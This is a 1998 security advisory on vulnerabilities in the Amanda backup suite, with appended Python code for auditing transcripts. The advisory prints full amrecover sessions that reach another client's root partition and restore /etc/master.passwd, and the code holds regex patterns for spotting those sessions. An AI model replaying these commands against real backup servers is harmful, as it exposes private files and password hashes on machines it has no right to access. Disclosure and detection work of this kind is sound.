CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software

Gale Pedowitz (gale@DARPANET.NET)
Sat, 10 Jan 1998 11:01:43 -0800

Cheers, all,

The notice that was sent out at 4AM today was released in error. This is
the actual release.

CPIO apologizes for the confusion.

--

**************** CPIO Security Notice ****************
Issue 11: 980105
Topic: Amanda v2.3.0.4 Backup Software
Platforms: Platform-independent
************** http://www.darpanet.net **************

This release concerns vulnerabilities in the Amanda backup software suite; remote users may exploit these vulnerabilities to view arbitrary files on Amanda network backup clients.

SUMMARY

There are several security problems in the current version of Amanda. The vulnerabilities detailed here are two of many discovered by an OpenBSD security audit. The Amanda core team has been contacted.

I. Any attacker can connect remotely to an index server, thus permitting access to any machine being backed up.

II. A malicious local user may access any partition or any files on a machine backed up through the network via Amanda.

EXAMPLE I:

    index.servername.net | the affected index server
    remote.attacker.org  | attacker's host
    staff                | a machine being backed up by the index server

    [remote%] amrecover -s index.servername.net
    AMRECOVER Version 1.0. Contacting server on index.servername.net ...
    220 index.servername.net AMANDA index server (1.0) ready.
    Setting restore date to today (1997-12-24)
    200 Working date set to 1997-12-24.
    200 Config set to DailySet1.
    501 No index records for host: remote.attacker.org. Invalid?
    amrecover> sethost staff
    200 Dump host set to staff.
    amrecover> setdisk wd0a
    200 Disk set to wd0a
    amrecover> ls
    [ list of root partition ]

EXAMPLE II:

    users | users shell machine being backed up
    staff | staff machine being backed up

    [users%] amrecover
    AMRECOVER Version 1.0. Contacting server on index.servername.net ...
    220 index.servername.net AMANDA index server (1.0) ready.
    Setting restore date to today (1997-12-24)
    200 Working date set to 1997-12-24.
    200 Config set to DailySet1.
    200 Dump host set to users.
    Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
    200 Disk set to wd0f.
    amrecover> setdisk wd0a
    200 Disk set to wd0a
    amrecover> cd etc
    amrecover> add master.passwd
    Added /etc/master.passwd
    amrecover> extract
    Extracting files using tape drive /dev/nrst0 on host index.servername.net.
    The following tapes are needed: DAILY6
    Restoring files into directory /home/home1/joey
    Continue? [Y/n]: y
    Load tape DAILY6 now
    Continue? [Y/n]: y
    amrecover> quit
    [local%] pwd
    /home/home1/joey
    [local%] ls master.passwd
    master.passwd

AFFECTED PLATFORMS AND NOTES

This vulnerability is related to problems in the software itself, and appears to be platform-independent. Platforms tested and known to be affected include OpenBSD and Linux.

FIXES

A patch from the authors is forthcoming. The only known workaround at this time is to completely disable Amanda.

CREDITS

This vulnerability was discovered and described by Joey Novell <joey@cpio.org>. Gale Pedowitz <gale@cpio.org> edited and prepared this release. Other contributors include Jonathan Katz <jkatz@cpio.org>.
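
For sites reviewing captured amrecover sessions, the following added example (not part of the CPIO notice and not Amanda code) flags the two patterns shown in EXAMPLE I and EXAMPLE II: a session that sets the dump host to a machine other than the one it came from, and a session that leaves its first disk before queuing files. The function name audit_session, the client_host argument and the idea that sessions are kept as text transcripts are assumptions; the reply formats are the ones printed in the examples above.

```python
import re

# Reply formats as they appear in the notice's two amrecover sessions.
HOST_SET = re.compile(r"^200 Dump host set to (\S+?)\.?$")
DISK_SET = re.compile(r"^200 Disk set to (\S+?)\.?$")
NO_INDEX = re.compile(r"^501 No index records for host: (\S+?)\. Invalid\?$")
ADDED = re.compile(r"^Added (\S+)$")

def audit_session(transcript, client_host):
    """Return review findings; client_host (assumed input) is where the session started."""
    findings = []
    host, disk, first_disk = client_host, None, None
    for line in map(str.strip, transcript.splitlines()):
        if m := NO_INDEX.match(line):
            findings.append(f"{m.group(1)} has no index records (not a backup client)")
        elif m := HOST_SET.match(line):
            host, disk, first_disk = m.group(1), None, None
            if host != client_host:
                findings.append(f"dump host set to {host}, session is from {client_host}")
        elif m := DISK_SET.match(line):
            disk = m.group(1)
            if first_disk is None:
                first_disk = disk  # disk derived from $CWD, or the first one chosen
            elif disk != first_disk:
                findings.append(f"disk changed from {first_disk} to {disk} on {host}")
        elif m := ADDED.match(line):
            if host != client_host or disk != first_disk:
                findings.append(f"queued for restore: {host}:{disk} {m.group(1)}")
    return findings

# Abridged from EXAMPLE I and EXAMPLE II of the notice.
EXAMPLE_I = """501 No index records for host: remote.attacker.org. Invalid?
amrecover> sethost staff
200 Dump host set to staff.
amrecover> setdisk wd0a
200 Disk set to wd0a"""
EXAMPLE_II = """200 Dump host set to users.
200 Disk set to wd0f.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> cd etc
amrecover> add master.passwd
Added /etc/master.passwd"""

if __name__ == "__main__":
    for name, text, src in (("I", EXAMPLE_I, "remote.attacker.org"), ("II", EXAMPLE_II, "users")):
        print(name, audit_session(text, src))
```

A file queued from the session's own first disk is not flagged, so this check narrows what to review; it does not replace access control on the index server.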